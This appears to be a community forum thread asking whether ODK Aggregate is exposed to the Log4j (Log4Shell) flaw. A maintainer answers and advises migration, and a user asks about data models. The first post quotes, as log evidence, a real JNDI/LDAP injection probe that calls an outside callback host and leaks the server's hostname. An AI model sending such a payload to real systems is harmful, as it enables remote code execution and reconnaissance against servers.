Log4j Vulnerability in ODK Aggregate?

bungle · December 13, 2021, 10:51am

Query:
Is ODK Aggregate open to the new Log4j vulnerability?
If so, how to fix?

Logging appears to be served by
log4j-over-slf4j-1.7.25.jar in C:\Tomcat 8.5\webapps\ODKAggregate\WEB-INF\lib
so log4j via Maven?

I can see hacking attempts in the logs today, e.g
"Invalid character found in the request target [/?x=${jndi:ldap://${hostName}.c6rf40gs3g4sr2vg71kgcg5xrpyyyyrpw.interactsh.com/a}]"
"Invalid character found in the request target [/?x=${jndi:ldap://${hostName}.c6rf40gs3g4sr2vg71kgcg5xrpyyyyrpw.interactsh.com/a}]""

yanokwa · December 13, 2021, 3:16pm

Aggregate reached end-of-life status on May 2021 and is no longer being updated.

I have taken a cursory look at Aggregate's dependencies and I do not believe it is susceptible to the recent log4j vulnerability (CVE-2021-44228).

That said, you should not be running Aggregate because it is likely susceptible to other vulnerabilities.

I urge you to migrate to Central. Get started with the install docs.

manghig · December 15, 2021, 4:10pm

@yanokwa thanks for checking. As a fact I checked the latest available version of Aggregate with https://github.com/anchore/grype and it returned a long list of vulnerabilities (but not log4shell).

But sometimes it not easy to move, I have for example a very critical survey still going with Aggregate and I can't just move to Central because there is a lot going on in the DB backend (PostgreSQL) when the data enters ODK forms tables, and I have still not found any docs that shows/explain how the data model used by Aggregate relates to the one used by Central. Is there anything out there?

with regards,
thanks for your work

yanokwa · December 16, 2021, 1:04am

2 posts were split to a new topic: Aggregate and Central data models